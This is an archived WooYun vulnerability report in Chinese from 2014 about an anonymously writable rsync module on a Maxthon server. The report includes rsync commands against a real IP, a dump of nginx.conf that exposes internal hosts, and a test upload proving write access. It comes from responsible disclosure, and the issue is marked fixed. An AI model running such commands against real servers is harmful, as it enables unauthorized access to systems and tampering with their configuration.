乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-09-15: 细节已通知厂商并且等待厂商处理中 2014-09-15: 厂商已经确认,细节仅向厂商公开 2014-09-25: 细节向核心白帽子及相关领域专家公开 2014-10-05: 细节向普通白帽子公开 2014-10-15: 细节向实习白帽子公开 2014-10-30: 细节向公众公开
傲游某服务配置不当,可直接替换nginx服务端配置文件,利用nginx内置的某些功能,可直接执行系统命令,或配置成一层反向代理穿透内网。
#1 描述RSYNC服务端可匿名访问,有权限读写文件58.68.245.43::nginx_conf
[root@10-6-2-22 tmp]# rsync 58.68.245.43::nginx_confdrwxr-xr-x 4096 2014/08/19 15:04:53 .-rw-r--r-- 979 2012/01/05 02:00:02 fastcgi.conf-rw-r--r-- 979 2012/01/05 02:00:02 fastcgi.conf.default-rw-r--r-- 909 2012/01/05 02:00:02 fastcgi_params-rw-r--r-- 909 2012/01/05 02:00:02 fastcgi_params.default-rw-r--r-- 2837 2012/01/05 02:00:02 koi-utf-rw-r--r-- 2223 2012/01/05 02:00:02 koi-win-rw-r--r-- 3174 2012/01/05 02:00:02 mime.types-rw-r--r-- 3174 2012/01/05 02:00:02 mime.types.default-rw-r--r-- 4876 2014/01/02 18:50:29 nginx.conf-rw-r--r-- 2726 2012/01/05 02:00:02 nginx.conf.default-rw-r--r-- 5263 2014/01/02 18:50:17 nginx.conf_bak.sq20140102-rw-r--r-- 6934 2012/04/16 17:01:10 nginx.conf_bak_20120416-rw-r--r-- 276 2013/09/27 16:57:03 nginx_status.conf-rw-r--r-- 544 2012/01/05 02:00:02 scgi_params-rw-r--r-- 544 2012/01/05 02:00:02 scgi_params.default-rw-r--r-- 570 2012/01/05 02:00:02 uwsgi_params-rw-r--r-- 570 2012/01/05 02:00:02 uwsgi_params.default-rw-r--r-- 3610 2012/01/05 02:00:02 win-utf
[root@10-6-2-22 tmp]# cat nginx.conf#user nobody;worker_processes 8;error_log /dev/null;#error_log logs/error.log debug_http;#error_log logs/error.log notice;#error_log logs/error.log info;#pid logs/nginx.pid;worker_rlimit_nofile 65535;events { use epoll; worker_connections 4096;}http { include mime.types; default_type application/octet-stream; log_format main '$remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for"'; access_log /dev/null; #access_log logs/access.log main; sendfile on; #tcp_nopush on; #keepalive_timeout 0; keepalive_timeout 65; #gzip on; proxy_set_header X-Real-IP $remote_addr; proxy_redirect off; proxy_set_header Host $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; client_max_body_size 10m; client_body_buffer_size 128k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; include nginx_status.conf; upstream total_sync { server 10.0.8.51; server 10.0.8.38; server 10.0.8.39;# server 10.0.8.179;# server 10.0.8.180; server 10.0.8.184; server 10.0.8.185; } server { listen 80; server_name #mx adfilter adfilter.sync.maxthon.cn mxadfilter1.maxthon.cn mxadfilter2.maxthon.cn mxadfilter.maxthon.cn mxadfilter.maxthon.com #mx admin admin.sync.maxthon.cn mxadmin.maxthon.cn mxadmin.maxthon.com #mx config config.sync.maxthon.cn mxconfig.maxthon.cn mxconfig.maxthon.com #mx smarturl smarturl.sync.maxthon.cn mxsmarturl.maxthon.cn mxsmarturl.maxthon.com #mx fas fas.sync.maxthon.cn mxfas.maxthon.cn mxfas.maxthon.com #mx magicfill magicfill.sync.maxthon.cn mxmagicfill.maxthon.cn mxmagicfill.maxthon.com #mx addonlist addonlist.sync.maxthon.cn; location ~^/.*/v1/(up_blk|end_up)/[0-9]+/(.*)_([0-9]+.[0-9]+.[0-9]+.[0-9]+) { proxy_pass http://$3; } location ~^/.*/v1/(ver|pre_up|pre_dl|dl_blk|end_dl)/[0-9]+ { proxy_pass http://total_sync; } } upstream notes.sync.servers { server 10.0.8.178; server 10.0.8.177; } server { listen 80; server_name notes.sync.maxthon.cn; location ~^/(notes-res|notes-meta)/v2/up_blk/[0-9]+/(.*)_([0-9]+.[0-9]+.[0-9]+.[0-9]+) { proxy_pass http://$3; } location ~^/(notes-res|notes-meta)/v2/end_up/[0-9]+/(.*)_([0-9]+.[0-9]+.[0-9]+.[0-9]+) { proxy_pass http://$3; } location ~^/(notes-res|notes-meta)/v2/(ver|pre_up|pre_dl|dl_blk|end_dl)/[0-9]+ { proxy_pass http://notes.sync.servers; } } upstream addons.sync.servers { server 10.0.8.208; server 10.0.8.209; } server { listen 80; server_name addons.sync.maxthon.cn; location ~^/v3/.+/[0-9]+/.+/(ver|pre_up|pre_dl|dl_blk|end_dl) { proxy_pass http://addons.sync.servers; } location ~^/v3/.+/[0-9]+/.+/(up_blk|end_up)/(.+)_([0-9]+.[0-9]+.[0-9]+.[0-9]+) { proxy_pass http://$3; } } upstream history.sync.servers { server 10.0.8.198; server 10.0.8.199; } server { listen 80; server_name history.sync.maxthon.cn history.sync.maxthon.com; location ~^/history-res/v2/ver|pre_up|pre_dl|dl_blk|end_dl/ { proxy_pass http://history.sync.servers; } location ~^/history-res/v2/(up_blk|end_up)/[0-9]+/(.+)_([0-9]+.[0-9]+.[0-9]+.[0-9]+) { proxy_pass http://$3; } }}
#2 利用
[root@10-6-2-22 tmp]# echo 123 > hello.txt[root@10-6-2-22 tmp]# rsync /var/tmp/ -av 58.68.245.43::nginx_confsending incremental file list./hello.txtsent 94 bytes received 30 bytes 27.56 bytes/sectotal size is 4 speedup is 0.03
这里直接替换掉nginx的配置文件,引入某些模块,就能执行系统命令了
[root@10-6-2-22 tmp]# rsync 58.68.245.43::nginx_confdrwxrwxrwt 4096 2014/09/15 16:38:44 .-rw-r--r-- 979 2012/01/05 02:00:02 fastcgi.conf-rw-r--r-- 979 2012/01/05 02:00:02 fastcgi.conf.default-rw-r--r-- 909 2012/01/05 02:00:02 fastcgi_params-rw-r--r-- 909 2012/01/05 02:00:02 fastcgi_params.default-rw-r--r-- 4 2014/09/15 16:38:48 hello.txt-rw-r--r-- 2837 2012/01/05 02:00:02 koi-utf-rw-r--r-- 2223 2012/01/05 02:00:02 koi-win-rw-r--r-- 3174 2012/01/05 02:00:02 mime.types-rw-r--r-- 3174 2012/01/05 02:00:02 mime.types.default-rw-r--r-- 4876 2014/01/02 18:50:29 nginx.conf-rw-r--r-- 2726 2012/01/05 02:00:02 nginx.conf.default-rw-r--r-- 5263 2014/01/02 18:50:17 nginx.conf_bak.sq20140102-rw-r--r-- 6934 2012/04/16 17:01:10 nginx.conf_bak_20120416-rw-r--r-- 276 2013/09/27 16:57:03 nginx_status.conf-rw-r--r-- 544 2012/01/05 02:00:02 scgi_params-rw-r--r-- 544 2012/01/05 02:00:02 scgi_params.default-rw-r--r-- 570 2012/01/05 02:00:02 uwsgi_params-rw-r--r-- 570 2012/01/05 02:00:02 uwsgi_params.default-rw-r--r-- 3610 2012/01/05 02:00:02 win-utf
# 关闭未授权可访问的服务
危害等级:低
漏洞Rank:5
确认时间:2014-09-15 17:11
已修复
暂无
